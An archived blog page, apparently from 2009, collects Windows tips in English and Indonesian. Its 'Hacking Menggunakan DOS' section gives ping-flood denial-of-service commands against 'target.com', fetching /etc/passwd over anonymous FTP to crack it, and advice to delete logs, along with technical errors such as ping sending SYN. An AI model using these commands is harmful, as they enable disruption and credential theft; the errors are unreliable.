Senin, 30 Maret 2009

How to modify *.exe files

learn how to change *.exe files, in 5 easy steps:

1) Don't try to modify a prog by editing his source in a dissasembler.Why?
Cause that's for programmers and assembly experts only.

try to view it in hex you'll only get tons of crap you don't understand.
First off, you need Resource Hacker(last version). It's a resource editor-
very easy to use, You can download it at h**p://www.users.on.net/johnson/resourcehacker/

2) Unzip the archive, and run ResHacker.exe. You can check out the help file too


3) You will see that the interface is simple and clean. Go to the menu FileOpen or press Ctrl+O to open a file. Browse your way to the file you would like to edit. You can edit *.exe, *.dll, *.ocx, *.scr and *.cpl files, but this tutorial is to teach you how to edit *.exe files, so open one.

4) In the left side of the screen a list of sections will appear.
The most common sections are
-String table;
-RCData;
-Dialog;
-Cursor group;
-Bitmap;
-WAV.
*Icon: You can wiew and change the icon(s) of the program by double-clicking the icon section,chossing the icon, right-clicking on it an pressing "replace resource". After that you can choose the icon you want to replace the original with.
*String table: a bunch of crap, useful sometimes, basic programming knowladge needed.
*RCData: Here the real hacking begins. Modify window titles, buttons, text, and lots more!
*Dialog:Here you can modify the messages or dialogs that appear in a program. Don't forget to press "Compile" when you're done!
*Cursor group: Change the mouse cursors used in the program just like you would change the icon.
*Bitmap: View or change images in the programs easy!
*WAV:Change the sounds in the prog. with your own.


5) In the RCData,Dialog,Menu and String table sections you can do a lot of changes. You can modify or translate the text change links, change buttons, etc.


TIP: To change a window title, search for something like: CAPTION "edit this".
TIP: After all operations press the "Compile Script" button, and when you're done editing save, your work @ FileSave(Save as).
TIP: When you save a file,the original file will be backed up by default and renamed to Name_original and the saved file will have the normal name of the changed prog.
TIP: Sometimes you may get a message like: "This program has a non-standard resource layout... it has probably been compressed with an .EXE compressor." That means that Resource Hacker can't modify it because of it's structure.


How To Stop Spam

Change Mcft to microsoft

HOW TO STOP SPAM VIA WINDOWS MESSENGER SERVICE
Below you'll find many ways (sorted in the most successful ratio first) to stop the Windows Messenger service, depending on your system environment, some may require more than one process. This service is available only on NT, 2K, XP & Server 2003. Administrator Login is REQUIRED

About The Messenger Service


* Messenger is a Windows Service that runs in the background
* Messenger is not the same as MSN Messenger or any other Instant Messaging Program
* Messenger does not facilitate two-way chatting
* Many Windows Programs, Firewalls, UPS and Antiviruses require the Messenger Service
* Antivirus and UPS software, among others, may not work if Messenger is disabled
* The Messenger Service is usually turned on by default in most Windows NT, 2K and XP systems


1. Manually

1. Example 1

1. Click Start, Run and enter the following command:
RunDll32 advpack.dll,LaunchINFSection %windir%\inf\msmsgs.inf,BLC.Remove
NOTE: This will prevent a long delay when opening Outlook Express if you have the Contacts pane enabled
2. To prevent this, click Start, Run and enter {REGEDIT} Go to:
HKEY_LOCAL_MACHINE\Software\Mcft\Outlook Express
3. Right click in the right pane and select New, Dword value
4. Give it the name Hide Messenger Double click this new entry and set the value to 2
5. End result should look EXACTLY like this:
System Key: [HKEY_LOCAL_MACHINE\SOFTWARE\Mcft\Outlook Express]
Value Name: Hide Messenger
Data Type: REG_DWORD (DWORD Value)
Value Data: (2 = remove messenger)

2. Example 2

1. Copy and paste the following to Run Command Bar in the Start Menu:
RunDll32.exe advpack.dll,LaunchINFSection
%windir%\inf\msmsgs.inf,BLC.Remove

3. Example 3

1. If Example 5 didn't work, then try this - Many users miss or don't know of it
2. Click on Start then go to RUN and type:
C:\WINDOWS\inf\sysoc.inf
3. Change:
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
4. To:
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,7
5. Then use Add/Remove Windows Components to remove Messenger
NOTE: You can also prevent access to Windows Messenger using Group Policy or the Set Program Access and Defaults utility added by default in Windows XP SP1 and Windows 2000 SP3




4. Example 4

1. Open Windows Messenger
2. From the menu, select "Tools" then "Options" then "Preferences" tab
3. Uncheck "Run this program when Windows starts"
4. Open Outlook Express
5. From the menu, select "Tools" then "Options" then "General" tab
6. Uncheck the option to "Automatically log on", if it's there
7. Also in Outlook Express, select "View" then "Layout"
8. Uncheck the option to "display Contacts" - The program will open a connection and display a list of all Contacts on line if you do not
9. In "Startup Folder" make sure there is no entry there for Messenger
10. Open Norton Anti-Virus if you have it installed
11. Click "Options" then "Instant Messenger"
12. Unckeck "Windows Messenger (recommended"
NOTE: This list ought to work in disassociate MSN from Outlook Express, so that it'll only start up if you really want it to

5. Example 5

1. 2000

* Click Start-> Settings-> Control Panel-> Administrative Tools->Services
* Scroll down and highlight "Messenger"
* Right-click the highlighted line and choose Properties
* Click the STOP button
* Select Disable in the Startup Type scroll bar
* Click OK

2. XP Home

* Click Start->Settings ->Control Panel
* Click Performance and Maintenance
* Click Administrative Tools
* Double click Services
* Scroll down and highlight "Messenger"
* Right-click the highlighted line and choose Properties
* Click the STOP button
* Select Disable in the Startup Type scroll bar
* Click OK

3. XP Professional

* Click Start->Settings ->Control Panel
* Click Administrative Tools
* Click Services
* Double click Services
* Scroll down and highlight "Messenger"
* Right-click the highlighted line and choose Properties.
* Click the STOP button.
* Select Disable in the Startup Type scroll bar
* Click OK

4. Windows NT

* Click Start ->Control Panel
* Double Click Administrative Tools
* Select Services-> Double-click on Messenger
* In the Messenger Properties window, select Stop
* Then choose Disable as the Startup Type
* Click OK
NOTE: If you stop the service and don’t adjust the startup type, the Messenger service will start automatically the next time you reboot. Keep in mind that when you disable the Messenger service, you'll no longer receive messages about an attached UPS, and you won’t be notified of print job completion, performance alerts, or antivirus activity (from Windows) not the program you're using for those purposes.

6. Example 6

1. To disable receipt of messenger pop-ups, verify that your firewall disables inbound traffic on UDP ports 135, 137, and 138, and TCP ports 135 and 139. On a system connected directly to the Internet, you should also disable inbound traffic on TCP port 445. If the system you want to protect is part of a Win2K-based network with Active Directory (AD), don't block incoming traffic on port 445 - Mcft Knowledge Base Article - 330904
Code:
http://support.Mcft.com/default.aspx?scid=kb;en-us;330904

NOTE: You can use the firewall approach only if your system doesn't communicate with legacy systems that rely on NetBIOS name resolution to locate machines and shared resources. If, for example, you let users running Windows 9x share your printer or scanner, when you disable inbound NetBIOS traffic, users won't be able to connect to these shared resources. Regardless of the method you choose, you can stop messenger spam

2. Program

1. Example 1

NOTE: On Oct 15, 2003, Mcft releases Critical Security Bulletin MS03-043 warning users that the Windows Messenger Service running and exposed by default in all versions of Windows NT, 2000 and XP, contains a "Remote Code Execution" vulnerability that allows any not otherwise secured and protected Windows machine to be taken over and remotely compromised over the Internet
1. Shoot the Messenger
Code:
http://grc.com/files/shootthemessenger.exe


2. Example 2

1. Messenger Disable
Code:
http://www.dougknox.com/xp/utils/MessengerDisable.zip

NOTE: If you choose to uninstall Windows Messenger on a system with SP1 installed, you will receive an error message about "un-registering" an OCX file. This is normal, and doest not affect the removal process. Windows Messenger will still be removed

3. TEST

1. Example 1

1. Right-click "My Computer"
2. Select "Manage"
3. Under "System Tools" right-click on "Shared Folders"
4. Choose "All Tasks" and select "Send Console Message..."
5. If you recieve the following error message then the service has been disabled, otherwise confirm that you have disabled it or try another example
"The following error occured while reading the list of sessions from Windows clients:
Error 2114: The Server service is not started."

2. Example 2

1. Click Start then "Run"
2. Type in {cmd.exe}
3. Type in net send 127.0.0.1 hi
4. If you get a popup "hi" message, then confirm that you have disabled it or try another example

4. IF YOU INSIST

1. If you insist on keeping Windows Messenger, then I'd recommend Messenger Manager - "Allows you to keep your messenger service running, as is intended and needed by Windows. This ensures that vital system errors and notifications may be sent informing you of Important System Events"
Code:
http://www.sellertools.com/default.asp?i=MessageManager3.htm

2. However, as a replacement to Windows Messenger remote control feature, I'd recommend this free tool Virtual Network Computing - "It is a remote control software which allows you to view and interact with one computer (the "server") using a simple program (the "viewer") on another computer anywhere on the Internet. The two computers don't even have to be the same type, so for example you can use VNC to view an office Linux machine on your Windows PC at home"
Code:
http://www.realvnc.com/download.html



RESULTS WILL VARY
No matter how good your systems may be, they're only as effective as what you put into them.

How to Rename File Extensions



A lot of people here may ask how to rename a file extension in windows; well it’s very simple and takes little of your time. There are two ways to rename a file extension ‘without’ a stupid program.



Number 1, Folder Options:



Go into your Control Panel, in my case I use Windows XP so I would press [Start then Control Panel]. Now that you figured out how to get in Control Panel open “Folder Options” and click the view tab and make sure ‘Hide file extensions for know files’ is not selected, then press Ok.



Now go into a folder and notice you can see your files extensions, rename them to whatever you'd like, for instance:



Code:

Dildos.exe to Dildos.Anonymous / Etc,Etc,Etc







Number 2, MS-DOS:



The difference between renaming files in DOS is that you can rename multiple files rather then one at a time, therefore making time gracious. Here I’ll provide you a few examples.



Go to your start menu and open run, then type “cmd” without parenthesis. Ok you’re in MS-DOS right? Geesh common man I know a 5 year old that can do it. Ok good your in? Excellent… Ok now find out which directory has your files and type:



Example



cd C:\Files\





In your case “C:\Files\” may not exist, so type in the directory that your have you files in. If everything goes will dos will look kinda like this:



Code:

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.



C:\Documents and Settings\User>cd C:\Files\





If all fails, you perhaps didn’t type in the correct folder/name and it will look like this:









Code:

C:\Documents and Settings\User> >cd C:\Filse\

The system cannot find the path specified.







Did you get in the directory yet????? If not I recommend you stick with the first step and hang yourself. Oh your in? OK COOL, type: dir and you will be provided with what files are in your folder, including their extensions. In my case:



Code:

C:\Files>dir

Volume in drive C has no dildo.

Volume Serial Number is CXXX-XXXX



Directory of C:\Files



02/01/2005 07:22 PM .

02/01/2005 07:22 PM ..

01/31/2005 06:40 PM 14,336 stf.bmp

01/31/2005 06:40 PM 14,336 stf02.bmp

2 File(s) 28,672 bytes

2 Dir(s) 39,024,766,976 bytes free



C:\Files>





Did you notice how I had two files named stf. Since both of these files have the same extension, *.bmp they can be renamed all together. If there are other files in there witht he same extension and you don't want to rename them, move them to another folder and / or directory.



Last but not least, after listening to my horrific grammar type:



Code:

C:\Files>ren *.bmp *.rar





And your results are:

Code:



C:\Files>dir

Volume in drive C has no penis.

Volume Serial Number is CXXX-XXXX



Directory of C:\Files



02/01/2005 07:37 PM .

02/01/2005 07:37 PM ..

01/31/2005 06:40 PM 14,336 stf.rar

01/31/2005 06:40 PM 14,336 stf02.rar

2 File(s) 28,672 bytes

2 Dir(s) 39,024,676,864 bytes free



C:\Files>]





Minggu, 29 Maret 2009

Hacking Menggunakan DOS

Microsoft DOS datang dengan beberapa hacking tool tersembunyi yang akan saya diskusikan disini. Tool ini dapat ditemukan pada direktori c:\windows jika anda menggunakan win98 dan jika anda menggunakan winxp maka tool ini berada pada C:\winxp\system32. WinXP, Win2000 dan WinNT dirilis dengan beberapa tool internet tambahan. Jadi jika anda masih menggunakan win98 maka saya menyarankan agar menggantinya dengan WinXP. Yang tentunya memiliki fitur securiti tambahan dan perintah hacking internet yang bagus. Dalam manual ini saya akan membahas mengenai beberapa perintah yang ditemukan pada Win98 dan winXP

Jadi bagi pengguna window, berikut ini perintah-perintah hacking pada DOS.

1. ping
2. tracert
3. telnet
4. ftp
5. netstat

OK, inilah keterangannya.

1. ping

Utiliy ini digunakan untuk mencari keberadaan remote host. Yan gmengirmkan sebuah signal SYN ke remote host dan jika remote host membalas maka berarti memang ada suatu remote machine.

Cobalah anda ketik perintah ini:

C:\windows>ping/?

*************
Newbie tip: mengetik '/?' setelah perintah dos menampilkan helpnya. Jadi bagaimana anda belajar aneka perintah dos. Bukankah WinXP, WinNT dan Win2000 juga memiliki perintah ‘help’ untuk menampilkan seluruh perintah dos.
*************
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
[-r count] [-s count] [[-j host-list] | [-k host-list]]
[-w timeout] destination-list

Options:
-t Ping the specified host until stopped.
To see statistics and continue - type Control-Break;
To stop - type Control-C.
-a Resolve addresses to hostnames.
-n count Number of echo requests to send.
-l size Send buffer size.
-f Set Don't Fragment flag in packet.
-i TTL Time To Live.
-v TOS Type Of Service.
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.
-w timeout Timeout in milliseconds to wait for each reply.



Jadi saya dapat melakukan ping ke ip address apapun atau domain name untuk memeriksa keberadaannya di internet. Sebagai contoh saya mengetik “ping localhost” maka saya mendapatkan.


Pinging chintan [127.0.0.1] with 32 bytes of data:

Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128

Ping statistics for 127.0.0.1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms



************
Newbie tip: 'localhost' adalah ip 127.0.0.1 dan merupakan ip address kita sendiri. Juga dikenal sebagai loopback ip. Tapi saat anda terhubung ke internet anda akan diberi ip baru oleh isp anda sebagai identifikasi diri anda. Anda dapat mencari tahu ip anda dengan mengetik”winipcfg” pada menu Start-Run bagi pengguna Win98, sedangkan yang lainnya hanya mengetikkan “ipconfig” pada command prompt.
***********

Hal ini menunjukkan kepada saya bahwa 32 byte data dikirim ke 127.0.0.1 dan dibalas kembali kurang dari 10ms. TTL adalah Time To Live dan nilai range dari 0 hingga 255 (default 128). Sekarang biar kita lihat apa yang terjadi jika saya mengetik “ping www.yahoo.com”

Pinging www.yahoo.akadns.net [66.218.71.87] with 32 bytes of data:

Reply from 66.218.71.87: bytes=32 time=3448ms TTL=54
Reply from 66.218.71.87: bytes=32 time=2276ms TTL=54
Reply from 66.218.71.87: bytes=32 time=1799ms TTL=54
Reply from 66.218.71.87: bytes=32 time=2850ms TTL=54

Ping statistics for 66.218.71.87:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 1799ms, Maximum = 3448ms, Average = 2593ms



Tapi bagaimana ping tersebut digunakan oleh para hacker? Baiklah, ada dua opsi ‘|’ dan ‘-t’ yang mematikan. -| digunakan untuk spesifikasi ukuran buffer yang dikirimkan (defaultnya 32 byte) bagaimana jika saya mengetik “ping -| 65600 target.com” maka hal ini akan membawa maut 65600 paket data ke target.com yang lebih tinggi dari kapasitas TCP/IP 65535. Tindakan ini menyebabkan target.com menjadi hang dan harus di restart.

Dan jika saya mengetik “ping –t target.com” hal ini akan meneruskan pengiriman 32 byte data ke target.com hingga menghabiskan resource dan menyebabkan hang. Dua jenis serangan diatas dikenal sebagai ping attack bagi penyerang Dos.

***********
Newbie tip: 'Dos' yang terakhir disebutkan adalah Denial of service yang dilancarkan oleh hacker untuk menghentikan service pada remote machine.
***********
Catatan: Jenis serangan ini dimasa lalu sering digunakan, namun saat ini pada sistem yang telah diperbarui hal tersebut tidak akan bekerja lagi.

2. Tracert

Perintah Tracert melakukan penjejakan ke remote machine. Sebelum request kita menjangkau remote machine melalui router yang berbeda diantaranya. Tool tracert (dikenal sebagai ‘traceroute’ pada unix) pada awalnya dirancang untuk mencari router mana yang mengalami masalah. Perintah tersebut menunjukkan ip address router yang dilalui request kita sebelum menjangkau remote maching. Sebagai contoh, jika saya mengetik “tracert http://www.yahoo.com/” pada dos prompt maka akan terdapat:

Tracing route to www.yahoo.akadns.net [66.218.71.87]
over a maximum of 30 hops:

1 * 2296 ms 2025 ms dialpool-210-214-55-11.maa.sify.net [210.214.55.11]
2 2446 ms 2025 ms 2301 ms dialpool-210-214-55-2.maa.sify.net [210.214.55.2]
3 1899 ms 2066 ms 2450 ms lan-202-144-32-177.maa.sify.net [202.144.32.177]
4 * 2885 ms 2749 ms lan-202-144-83-4.maa.sify.net [202.144.83.4]
5 * * * Request timed out.
6 * * * Request timed out.
7 * * * Request timed out.
8 * * * Request timed out.
9 * * * Request timed out.
10 * 3408 ms * www.yahoo.akadns.net [66.218.71.87]
11 * * * Request timed out.
12 * * * Request timed out.
13 * * * Request timed out.
14 * * * Request timed out.
15 * * * Request timed out.
16 * * * Request timed out.
17 482 ms 698 ms 624 ms w8.scd.yahoo.com [66.218.71.87]

Trace complete.

Baris pertama memberitahukan kita ip mana yang menjejaki dan kemudian jumlah hop. Jumlah hop tergantung pada jumlah server yang ada diantaranya. Setelah memulai tracing. Request pertama saya melalui sify.net (nama ISP server saya) kemudian melalui server yang berbeda dan terakhir menjangkau w8.scd.yahoo.com. Jadi kita dapat melihat berapa lama prosedurnya. Kapanpun anda membuka http://www.yahoo.com/ dalam web browser, request anda selalu melalui isp dulu (untuk mendapatkan ip dari http://www.yahoo.com/ dari daftar nama domainnya) kemudian server lain dalam jalur tersebut dan terakhir pada yahoo.

Jadi bagaimana tracert digunakan oleh para hacker. Perintah ini digunakan untuk mencari firewall dan melumpuhkannya. Tracer digunakan bersamaan dengan nmap dapat mengetahui ip sebenarnya dimana firewall terpasang, kemudian hacker tersebut akan melumpuhkannya. Untuk contoh diatas kita melihat bahwa proses tracing terhenti pada w8.scd.yahoo.com. Namun hal ini bukanlah tujuan sebenarnya. Hal itu dikarenakan dihentikan oleh firewall. Mengenai masalah firewall akan kita bahas dalam artikel tersendiri.


3. Telnet

Jika anda menggunakan windows maka ‘telnet’ merupakan hacking tool terhebat bagi anda. Sebenarnya merupakan sebuah terminal yang dapat mengakses remote machine dan menggunakan service-nya. Melalui telnet anda dapat menentukan suatu koneksi antara mesin anda dan remote machine melalui port tertentu.


***********
Newbie tip: Disini saya membicarakan tentang virtual port. Tidak secara fisik yang anda lihat dibalik CPU anda. Hanya sebagai physical port yang digunakan untuk koneksi ke hardware dan dengan cara yang sama virtual port digunakan untuk koneksi pada software. TCP/IP memiliki 65,535 virtual port.
***********
Jika anda mengentik “telnet target.com” maka anda terhubung ke target.com pada prot no. 23 (port yang menjalankan telnet service). Anda juga bisa terhubung ke suatu port lainnya dengan mengetik nomor port setelah target.com. sebagai contoh jika saya ingin terhubung ke port no. 25 (SMTP service) maka salya akan mengetik “telnet target.com 25”.
***********
Newbie tip: Setiap port menjalankan service tertentu. Untuk mendaptkan daftar service yang dijalankan pada port tertentu yang bukalah “C:\windows\services" pada notepad.
***********
Sesaat anda terhubung ke sebuah remote machine pada port tertentu, sebuah window popup telnet dengan daemon yang menjalankan port tersebut menunggu anda mengetikkan perintah. Sebagai contoh “telnet http://www.cyberspace.org/” maka seperti gambar dibawah inilah yang saya dapatkan.




Saya harus login disana dan mengetik suatu password dan saya mendapatkan linux shell prompt. Baiklah jika anda mengetikan newuser disana untuk mendapatkan sebuah LoginID dan Password. Dan stelah itu saya menyiapkan perintah untuk mengeksekusi secara remote.

Well, http://www.cyberspace.org/ memiliki server Linux. Jadi jika anda tidak familiar dengan Linux anda tidak akan mampu menggunakan service-nya.



4. FTP

FTP adalah File Transfer Protocol. Melalui ini anda dapat mendownload atau mengupload file. Dan apa yang hacker inginkan dari ini? Benar!! Tinggal mengeti “ftp target.com” dan daemon banner akan ditampilkan. Tapi disini, dengan tujuan menampilkan file transfer pertama kali anda harus login. Beberapa website mengijinkan adanya naonymous login. Contohnya mengetikkan login “anonymous” dan email-address anda sebagai password. Tentunya anda harus mengetikkan email palsu. Sekarang anda boleh mulai mendownload dan mengupload file. Namun untuk itu anda adanya suatu perintah. Pada FTP prompt anda dapat mengetikkan “?”. Maka akan ditampilkan sbb:


! delete literal prompt send
? debug ls put status
append dir mdelete pwd trace
ascii disconnect mdir quit type
bell get mget quote user
binary globe mkdir recv verbose
bye hash mls remotehelp
cd help mput rename
close lcd open rmdir

Untuk mendaptkan bantuan pada berbagai perintah contohnya perintah delete, mengetikan “? Delete”. Beberapa perintah penting lainnya adalah:

1. 'pwd' to know the present directory at remote machine.
contohnya. ftp>pwd
/etc/home
2. 'lcd' to change the local directory.
contohnya. ftp>lcd C:\windows
local directory now C:\windows
3. 'cd' to change the remote directory.
contohnya. ftp>cd /etc
remote directory now /etc
4. 'mput' to send multiple files to remote machine.
contohnya. ftp>mput *.*
sends all files from C:\windows to /etc
5. 'mget' to get multiple files from remote machine.
contohnya. ftp>mget *.*
gets all files from /etc to C:\windows
6. 'open' to establish a connection with remote host.
contohnya. ftp>open www.target.com
7. 'bye' closes the connection and quits from ftp

Untuk perintah lainnya dari ftp silakan lihat help mereka.

Sekarang pada yang port FTP (prot 21) adalah membuka http://www.nosecurity.com/. Seorang hacker akan terhubung ke situs tersebut menggunakan “ftp http://www.nosecurity.com/” pada dos prompt. Kemudian dia akan mencoba login secara anonymous. Dengan anggapan bahwa http://www.nosecurity.com/ menggunakan linux server, maka hacker tersebut akan mengtikkan perintah “get /etc/apsswd” untuk mendaptkan file password dan mengcracknya. Jika anda adalah seorang hacker, maka jangan lupa untuk menghapus log tersebut.



5. netstat

Anda dapat menentukan suatu koneksi dengan remote machine pada port tertentu, hanya saat port tersebut dibuka pada remote machine. Sebagai contoh, jika anda ingin menentukan sebuah koneksi dengan http://www.target.com/ pada port 23 (telnet) maka port tersebut seharusnya terbuka pada http://www.target.com/. Dan seluruh aktifitas hacking umumnya menggunakan port yang terbuka. Mengetikkan “netstat /?” pada dos prompt memberikan:


Displays protocol statistics and current TCP/IP network connections.

NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

-a Displays all connections and listening ports.
-e Displays Ethernet statistics. This may be combined with the -s
option.
-n Displays addresses and port numbers in numerical form.
-p proto Shows connections for the protocol specified by proto; proto
may be TCP or UDP. If used with the -s option to display
per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are
shown for TCP, UDP and IP; the -p option may be used to specify
a subset of the default.
interval Redisplays selected statistics, pausing interval seconds
between each display. Press CTRL+C to stop redisplaying
statistics. If omitted, netstat will print the current
configuration information once.

Opsi akan menjelaskan fungsinya masing-masing. Dan yang terpenting adalah opsi –a dan –n. Opsi –a menampilkan seluruh port yang terbuka pada mesin tersebut. Dan jika saya menggunakan opsi –n maka akan menunjukkan ip address sebagai ganti dari domain. Saya mendapatkan hal berikut ini jika saya mengetik “netstat –a” pada command prompt.


Active Connections

Proto Local Address Foreign Address State
TCP chintan:1027 0.0.0.0:0 LISTENING
TCP chintan:80 0.0.0.0:0 LISTENING
TCP chintan:135 0.0.0.0:0 LISTENING
TCP chintan:6435 0.0.0.0:0 LISTENING
TCP chintan:1025 0.0.0.0:0 LISTENING
TCP chintan:1026 0.0.0.0:0 LISTENING
TCP chintan:1028 0.0.0.0:0 LISTENING
TCP chintan:1309 0.0.0.0:0 LISTENING
TCP chintan:1310 0.0.0.0:0 LISTENING
TCP chintan:1285 rumcajs.box.sk:80 ESTABLISHED
TCP chintan:1296 l an-202-144-78-3.maa.sify.net:80 CLOSE_WAIT
TCP chintan:1297 lan-202-144-65-14.sify.net:80 ESTABLISHED
TCP chintan:1310 cdn-v13.websys.aol.com:80 ESTABLISHED
TCP chintan:1220 aiedownload.cps.intel.com:ftp ESTABLISHED

”Proto” menyatakan nama protocol tersebut, “localaddress” memberikan ipaddress kita dan port yang terbuka. “Foreign Address” menyatkaan ipaddress dengan namor port yang terhubung ke kita. “State” menyatakan pernyataan saat ini jika suatu koneksi “established” atau listening atau hanya “waiting”.

Sebagai contoh jika saya membuka http://www.yahoo.com/ maka saat saya menjalankan “netstat –a” saya akan mendapatkan masukan seperti ini:

"TCP 203.43.50.81:2034 www.yahoo.com:80 ESTABLISHED"

Komputer saya dengan ip 203.43.50.81 melalui port 2034 terhubung dengan yahoo pada port 80


*************
Newbie tip: Dengna cara ini anda bisa mendapatkan ip seseorang yang chatting dengan ada. Pertama kali jalankan “netstat –an” dan lihat dibawah foreign ip address. Sekarang mulailah private chating dengan orang lain. Juga jalankan “netstat –an” dan anda akan mendapatkan satu lagin foreign ip pada akhirnya. Inilah ip orang tersebut.
*************



For any questions on this commands please feel free to mail me. My email address is chesschintan@hotmail.com



Chating Melalui Telnet

Chating Melalui Telnet

Membuat koneksi langsung ke sebuah IRC server dan meluangkan sedikit waktu untuk mencoba perintah protokol IRC hingga anda bisa menggunakan program secara langsung

Jarkko Oikarinen pertama kali mengenalkan IRC ke seluruh dunia pada tahun 1988. Lima tahun yang lalu, dia benar-benar telah mendefinisikan protokol IRC dalam RFC 1459, yang membuat seluruh protokol menjadi lebih bisa diakses. Berangkat dari informasi ini, anda dapat lebih memahami protokol berbasis teks sederhana dan mempelajari cara terhbung ke IRC server tanpa menggunakan client khusus. Saat anda menguasai hal ini, anda seharusnya dengan mudah menulis program ylang terhubung ke IRC.


TIP

Anda dapat menemukan seluruh dokumen Internet RFC (Request for Comment) di http://www.faqs.org/rfcs. anda dapat mencari arsip tersebut dengan kata atau nomor dokumen. RFC 1459 dapat ditemukan di http://www.faqs.org/rfcs/rfc1459.html

Sayangnya, anda tidak perlu mengetahui seluruh spesifikasi lengkap untuk terhubung ke sebuah IRC server. Menghubungkan diri ke suatu IRC server hanya memerlukan beberapa perintah yang dikirim. Cara terbaik untuk memahami bagaimana perintah ini bekerja adalah terhubung langsung ke IRC server dengan Telnet dan mengetik perintah ini secara langsung. telnet memungkinkan anda untuk menyesuaikan koneksi TCP ke sebuah port pada remote machine dan tinggal mulai mengetik perintah yang berfungsi service listening pada port tersebut.

Kebanyakan IRC server dijalankan pada port 6667, walaupun anda bsia saja menemukan beberapa operasi tersebut pada nomor port yang berbeda untuk membantu user yang terhalang firewall perusahaan. Pada contoh ini, anda dapat mencoba menghubungkan diri ke jaringan freenode IRC dengan menjalankan Telnet dari command prompt dengan parameter baris perintah berikut:

% telnet irc.freenode.net 6667

Jika koneksi tersebut berhasil, anda akan melihat server merespon dengan sesuatu seperti ini:

NOTICE AUTH :*** Looking up your hostname...

NOTICE AUTH :*** Found your hostname, welcome back

NOTICE AUTH :*** Checking ident

NOTICE AUTH :*** No identd (auth) response

Meski socket tersebut pada dasarnya terhubung ke IRC server, anda masih harus melakukan beberapa hal. RIC server perlu mengetahui login anda, real name dan nickname yang ingin anda gunakan.

Perintah NICK digunakan untuk menetapkan nickname anda. Dilakukan secara langsung, jadi jika anda ingin nickname “si_cebol”, maka tinggal mengetik ke Telnet Window tersebut dan menekan Enter.

NICK si_cebol

Jika nick name tersebut telah didaftar orang lain pada server tersebut, anda diberitahukan untuk tetap mengirim perintah yang sama dengan nickname yang berbeda pada suatu waktu, hingga anda menemukan salah satu yang sesuai. Jenis pesan inilah yang akan anda lihat jika nickname yang dipilih telah digunakan orang lain.


:kornbluth.freenode.net 433 * si_cebol :Nickname is already in use.

Perintah USER yangdigunakan untuk login, mode user dan real name. Jika mau untuk login “si_cebol” maka tinggal mengetikkan perintah berikut, kemudian tekan Enter.

USER si_cebol 8 * : Iwan Permana

Kebanyakan server saat ini menggunakan perintah dari IRC RFC 2812 yang diupdate. Perintah User membuat penggunaan beberapa fitur tertentu dalam update dokumen ini. Terutama, angka 8 adalah numeric mode parameter yang digunakan secara otomatis untuk menetapkan mode user saat mendaftar pada server tersebut. Paramater ini merupakan sebuah bit mask, dengan bit 2 yang mewakili user mode w dan bit 3 yang mewakili user mode i, jadi menggunakan nilai 8 artinya bahwa anda menanyakan server tersebut untuk menetapkan mode invisible bagi anda. Sekarang, tinggal 2 bit yang tergolong signifikan. Juga perlu dicatat bahwa teks setelah tanda : adalah dimana anda mengisikan real name.

Setelah berhasil mengirimkan perintah NICK dan USER, server tersebut akan mengirimkan beberapa baris teks kepada anda. Jika tidak terjadi apapun untuk beberapa sat, jangan cemas—server tersebut mungkin mengalami gangguan suatu artificialdelay hingga 1 menit, jika tidak menemukan suatu Ident server yang dijalankan pada mesin anda. Pertama kali, beris tersebut dikirm dari server yang jarang terpengaruh kondisi ini, tapi mungkin anda mengenal beberapabagian dari message of the day “You are now connected to the IRC server!

TIP

Ident (Identification Protocol) merupakan dokumentasi RFC 1413. Lihat http://www.faqs.org/rfcs/rfc1413.html untuk keterangan lengkapnya.

Sekarang anda telah terhubung, anda dapat menggunakan fungsi IRC client secara total sepanjang yang bisa dilakukannya.

Staying Alive

Terkadang kesulitan pada IRC server untuk menjaga track yang masih terhubung. Satu trik yang mereka lakukan adalah mengirim perintah PING ke client yang tidak melakukan aktifitas apapun. Client tersebut diahrapkan merespon dengan pesan PONG atau katakanlah, “Hei, Saya masih disini!” Jika client tersebut tidak merespon dalam suatu waktu, server tersebut akan menutup koneksinya. Aturan Umum yang berlaku, PONG reply harus termasuk argumen yang dikirim sebagai bagian dari perintah ping dari server tersebut. Jadi jika anda menerima pesan berikut ini:

PING :kornbluth.freenode.net

Anda akan me-reply dengan perintah PONG berikut:

PONG :kornbluth.freenode.net

Join ke Channel dan Mengirim Pesan

Perintah IRC client seperti /join dan /msg tidak akan bekerja disini, anda harus menyesuaikan dengan protokol langsung tersebut. Anda dapat menganggap koneksi Telnet sebagai suatu bentuk primitif IRC client—anda masih bisa melakukan apapun yang bisa IRC client lakukan, hanya saja terlihat sedikit kaku dan perintahnya berbeda. Meski begitu, masih lebih mudah join ke channel dan mengirim pesan ke user lain. Untuk join ke channel #irchacks, anda harus mengetik.

JOIN #irchacks

Jika seluruhnya berjalan baik, anda dapat melihat IRC server me-reply dengan beberapa baris teks. IRC client menggunakan baris ini untuk menetapkan siapa yang ada dalam channel tersebut jadi mereka dapat mengupdate daftar usernya. Untuk saat ini, anda tidak perlu mencemaskan tentang bagaimana proses informasi tersebut.

Mengirimkan pesan tanpa instuisi yang jelas dapat dilakukan dengan perintah PRIVMSG. Sebagaimana yang anda harapkan dari nama terserbut, perintah ini dapat digunakan untuk mengirim private message ke user lain, juga dapat digunakan untuk mengirim pesan ke channel yang ada. Untuk mengirim pesan ke channel #irchacks, anda dapat mencoba perintah berikut:

PRIVMSG #irchacks :Hello everybody!

Mengirimkan private message cukup mudah—tinggal mengunakan nickname penerima pesan yang ditempatkan pada nama channel tersebut. Jika anda ingin mengirim suatu private message ke user dengan nickname “B0iler”, anda ketik saja:

PRIVMSG

B0iler

Hi B0iler.

